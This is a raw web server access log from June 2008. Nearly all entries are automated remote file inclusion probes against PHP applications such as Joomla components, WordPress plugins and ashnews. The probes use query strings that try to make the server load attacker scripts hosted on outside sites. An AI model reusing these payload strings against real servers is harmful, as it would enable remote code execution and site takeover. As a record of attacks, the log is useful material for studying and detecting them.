194.58.78.39 - - [09/Jun/2008:06:33:53 -0700] "GET //index.php?skin_file=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
203.237.236.11 - - [09/Jun/2008:06:36:50 -0700] "GET //index.php?skin_file=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:06:39:36 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:06:39:36 -0700] "GET //ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
81.174.65.190 - - [09/Jun/2008:06:42:47 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
81.174.65.190 - - [09/Jun/2008:06:42:51 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
81.174.65.190 - - [09/Jun/2008:06:42:54 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:06:43:11 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:06:44:46 -0700] "GET /logs/access_080519.log//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
216.75.35.118 - - [09/Jun/2008:06:47:16 -0700] "GET /logs/com_joomla-visites/core/include/myMailer.class.php=http://www.delcorso.org/images/inc.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
216.75.35.118 - - [09/Jun/2008:06:47:16 -0700] "GET /com_joomla-visites/core/include/myMailer.class.php=http://www.delcorso.org/images/inc.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:06:47:28 -0700] "GET /logs/access.log//login.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:06:47:28 -0700] "GET /logs//login.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:06:47:28 -0700] "GET //login.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:06:49:09 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:06:49:10 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:06:49:10 -0700] "GET //ashnews.php?pathtoashnews=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:06:49:11 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:06:49:11 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:06:49:12 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
81.174.65.190 - - [09/Jun/2008:06:51:21 -0700] "GET /admin.php?include_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
81.174.65.190 - - [09/Jun/2008:06:51:26 -0700] "GET /logs/access.log/admin.php?include_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
81.174.65.190 - - [09/Jun/2008:06:51:30 -0700] "GET /logs/admin.php?include_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
218.208.21.7 - - [09/Jun/2008:06:52:30 -0700] "GET //ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
218.208.21.7 - - [09/Jun/2008:06:52:30 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
69.65.104.52 - - [09/Jun/2008:06:52:35 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=errors.php?error=http://www.avedila.com/avedila/.../idv.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
69.65.104.52 - - [09/Jun/2008:06:52:35 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=errors.php?error=http://www.avedila.com/avedila/.../idv.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
69.65.104.52 - - [09/Jun/2008:06:52:36 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=errors.php?error=http://www.avedila.com/avedila/.../idv.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:06:52:48 -0700] "GET /logs/access_080519.log//ashnews.php?pathtoashnews=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:06:52:49 -0700] "GET /logs/access_080519.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
93.93.112.60 - - [09/Jun/2008:06:54:43 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,48//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
93.93.112.60 - - [09/Jun/2008:06:54:44 -0700] "GET //component/option,com_sitemap/Itemid,48//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
93.93.112.60 - - [09/Jun/2008:06:54:44 -0700] "GET /logs//component/option,com_sitemap/Itemid,48//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:55:43 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:55:43 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:55:43 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:03 -0700] "GET /logs/access.log/errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:04 -0700] "GET /errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:04 -0700] "GET /logs/errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:22 -0700] "GET /logs/access.log/errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:23 -0700] "GET /errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:23 -0700] "GET /logs/errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
218.208.21.7 - - [09/Jun/2008:06:56:33 -0700] "GET /logs/access_080602.log//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:33 -0700] "GET /logs/access.log/errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:33 -0700] "GET /errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:34 -0700] "GET /logs/errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:35 -0700] "GET /logs/access.log/errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:35 -0700] "GET /errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:35 -0700] "GET /logs/errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:39 -0700] "GET /logs/access.log/errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:39 -0700] "GET /errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:06:56:40 -0700] "GET /logs/errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
203.130.242.135 - - [09/Jun/2008:06:57:03 -0700] "GET /logs//index.php?skin_file=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
203.130.242.135 - - [09/Jun/2008:06:57:04 -0700] "GET //index.php?skin_file=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
93.93.112.60 - - [09/Jun/2008:06:57:13 -0700] "GET /logs/access.log/errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
93.93.112.60 - - [09/Jun/2008:06:57:14 -0700] "GET /errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
93.93.112.60 - - [09/Jun/2008:06:57:14 -0700] "GET /logs/errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
93.93.112.60 - - [09/Jun/2008:06:57:56 -0700] "GET /logs/access.log/errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
93.93.112.60 - - [09/Jun/2008:06:57:56 -0700] "GET /errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
93.93.112.60 - - [09/Jun/2008:06:57:57 -0700] "GET /logs/errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
218.208.21.7 - - [09/Jun/2008:07:01:18 -0700] "GET /logs/access_080519.log//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
218.208.21.7 - - [09/Jun/2008:07:01:40 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:03:40 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:03:41 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:03:41 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
58.69.172.67 - - [09/Jun/2008:07:06:27 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
58.69.172.67 - - [09/Jun/2008:07:06:28 -0700] "GET //ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.50.73.5 - - [09/Jun/2008:07:07:47 -0700] "GET /?p=108 HTTP/1.0" 200 498 "-" "Python-urllib/2.1" "blog.notahamsandwich.com"
58.69.172.67 - - [09/Jun/2008:07:11:32 -0700] "GET /logs/access_080602.log//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
203.130.242.135 - - [09/Jun/2008:07:11:33 -0700] "GET /logs/access_080519.log//index.php?skin_file=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
203.130.242.135 - - [09/Jun/2008:07:11:39 -0700] "GET /logs/access.log//index.php?skin_file=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
64.136.58.116 - - [09/Jun/2008:07:13:06 -0700] "GET /logs/access.log//errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.136.58.116 - - [09/Jun/2008:07:13:06 -0700] "GET //errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.136.58.116 - - [09/Jun/2008:07:13:06 -0700] "GET /logs//errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:14:44 -0700] "GET /logs/access.log//errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:14:44 -0700] "GET /logs/access.log//errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:14:44 -0700] "GET //errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:14:44 -0700] "GET //errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:14:44 -0700] "GET /logs//errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:14:45 -0700] "GET /logs//errors.php?error=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:14:48 -0700] "GET /logs/access.log//errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:14:48 -0700] "GET //errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:07:14:48 -0700] "GET /logs//errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
72.14.199.72 - - [09/Jun/2008:07:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
58.69.172.67 - - [09/Jun/2008:07:19:08 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
58.69.172.67 - - [09/Jun/2008:07:19:39 -0700] "GET /logs/access_080519.log//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
200.68.101.180 - - [09/Jun/2008:07:23:42 -0700] "GET //wp-content/plugins/./wordtube-button.php?wpPATH=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.notahamsandwich.com"
200.68.101.180 - - [09/Jun/2008:07:23:42 -0700] "GET /logs//wp-content/plugins/./wordtube-button.php?wpPATH=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.notahamsandwich.com"
203.22.204.160 - - [09/Jun/2008:07:26:09 -0700] "GET /logs//wp-content/plugins/./wordtube-button.php?wpPATH=http://www.geocities.com/mirza.putri/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.notahamsandwich.com"
203.22.204.160 - - [09/Jun/2008:07:26:09 -0700] "GET //wp-content/plugins/./wordtube-button.php?wpPATH=http://www.geocities.com/mirza.putri/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:07:26:34 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:07:26:35 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:07:26:35 -0700] "GET //ashnews.php?pathtoashnews=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:07:26:36 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:07:26:36 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:07:26:37 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
200.68.101.180 - - [09/Jun/2008:07:27:51 -0700] "GET /logs//sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "notahamsandwich.com"
200.68.101.180 - - [09/Jun/2008:07:27:51 -0700] "GET //sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "notahamsandwich.com"
211.239.161.10 - - [09/Jun/2008:07:29:07 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://supervisa.com.mx/up.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:07:29:34 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:07:29:34 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.notahamsandwich.com"
72.47.213.57 - - [09/Jun/2008:07:34:26 -0700] "GET /errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:07:42:10 -0700] "GET //wp-content/plugins/./wordtube-button.php?wpPATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
207.218.234.146 - - [09/Jun/2008:07:44:34 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.economicalspace.com/support/images/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.notahamsandwich.com"
207.218.234.146 - - [09/Jun/2008:07:44:34 -0700] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.economicalspace.com/support/images/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.notahamsandwich.com"
211.239.161.10 - - [09/Jun/2008:07:46:55 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://supervisa.com.mx/up.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.notahamsandwich.com"
203.22.204.160 - - [09/Jun/2008:07:52:35 -0700] "GET //sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.geocities.com/mirza.putri/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "notahamsandwich.com"
206.221.179.200 - - [09/Jun/2008:07:53:39 -0700] "GET //postscript/postscript.php?p_mode=http://supervisa.com.mx/up.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
206.221.179.200 - - [09/Jun/2008:07:53:39 -0700] "GET /logs//postscript/postscript.php?p_mode=http://supervisa.com.mx/up.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
72.47.213.57 - - [09/Jun/2008:07:57:55 -0700] "GET /logs/errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:07:58:54 -0700] "GET //sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:08:11:44 -0700] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:08:11:44 -0700] "GET //bbs/skin/zero_vote/setup.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:08:13:13 -0700] "GET /logs/access.log//sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:08:13:14 -0700] "GET /logs//sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "notahamsandwich.com"
89.108.67.119 - - [09/Jun/2008:08:14:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
89.108.67.119 - - [09/Jun/2008:08:14:52 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:08:16:24 -0700] "GET /logs/access.log//bbs/skin/zero_vote/setup.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
216.127.70.91 - - [09/Jun/2008:08:16:37 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
